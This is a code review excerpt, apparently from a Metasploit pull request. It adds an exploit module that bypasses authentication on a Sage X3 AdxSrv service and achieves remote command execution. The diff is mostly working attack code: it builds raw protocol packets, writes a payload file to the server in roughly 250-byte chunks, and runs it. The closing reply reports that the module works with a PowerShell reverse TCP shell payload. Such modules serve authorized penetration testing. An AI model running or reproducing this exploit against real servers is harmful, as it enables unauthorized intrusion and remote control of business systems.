modules/exploits/x3/x3_adxsrv_auth_bypass_cmd_exec.rb

```diff
@@ -0,0 +1,342 @@
+    s.write(auth_packet)
+
+    # recv thing
+    res = s.read(1024)
+    if res.nil? || res.length != 4
+      fail_with(Failure::UnexpectedReply, 'ADXDIR authentication failed')
+    end
+    print_good('ADXDIR authentication successful.')
+
+    # ADXDIR command
+    adx_dir_msg = "\x07\x41\x44\x58\x44\x49\x52\x00"
+    s.write(adx_dir_msg)
+    directory = s.read(1024)
+    if directory.nil?
+      fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response')
+    end
+    print_good(format('Received directory info from host: %s', directory[4..-2]))
+    disconnect
+    return directory[4..-2]
+  end
+
+  def build_buffer(head, sage_payload, tail)
+    buffer = ''
+    unless head.nil?
+      # do things
+      buffer << head
+    end
+
+    buffer << sage_payload.length
+    buffer << sage_payload
+
+    unless tail.nil?
+      buffer << tail
+    end
+    return buffer
+  end
+
+  def write_file(s, filenum, sage_payload, target, sagedir)
+    # building the initial authentication packet
+    # [2bytes][userlen 1 byte][username][userlen 1 byte][username][passlen 1 byte][CRYPT:HASH]
+    # Note: the first byte of this auth packet is different from the ADXDIR command
+
+    revsagedir = sagedir.gsub('\\', '/')
+
+    s.write("\x06\x00")
+    auth_resp = s.read(1024)
+    if auth_resp.length != 4
+      fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response')
+    end
+    print_good('Command authentication successful.')
+
+    # May require additional information such as file path
+    # this will be used for multiple messages
+
+    head = "\x00\x00\x36\x02\x00\x2e\x00" # head
+    fmt = '@%s/tmp/cmd%s$cmd'
+    if target == 'Windows DLL'
+      fmt = '@%s/tmp/cmd%s.dll'
+    end
+    if (target == 'Windows Executable') || (target == 'Custom Executable')
+      fmt = '@%s/tmp/cmd%s.exe'
+    end
+    pload = format(fmt, revsagedir, filenum)
+    tail = "\x00\x03\x00\x01\x77"
+    sendbuf = build_buffer(head, pload, tail)
+    s.write(sendbuf)
+    s.read(1024)
+
+    # Packet --- 3
+    # Creating the packet that contains the command to run
+    head = "\x02\x00\x05\x08\x00\x00\x00"
+
+    # this writes the data to the .cmd file to get executed
+    # a single write can't be larger than ~250 bytes
+    # so writes larger than 250 need to be broken up
+    written = 0
+    print_status('Writing data')
+    while written < sage_payload.length
+      print('.')
+      towrite = sage_payload[written..written + 250]
+      sendbuf = build_buffer(head, towrite, nil)
+      s.write(sendbuf)
+      s.recv(1024)
+
+      written += towrite.length
+    end
+    print("\r\n")
+  end
+
+  def exploit
+    unless datastore['CMD'].blank?
+      sage_payload = datastore['CMD']
+    end
+    if (target.name == 'Windows Command') && sage_payload.blank?
+      fail_with(Failure::BadConfig, 'Select a different target or set CMD option')
```

Comment:
Windows command payloads have more options than just the generic one that allows the user to set their own command. You should be able to set `sage_payload` to `payload.encoded` when the target is 'Windows Command' to allow any of the Windows command payloads to work with this module including the default generic one.

Reply:
Changed it to payload.encoded, it worked for cmd/windows/powershell_reverse_tcp, though most of the others I tried failed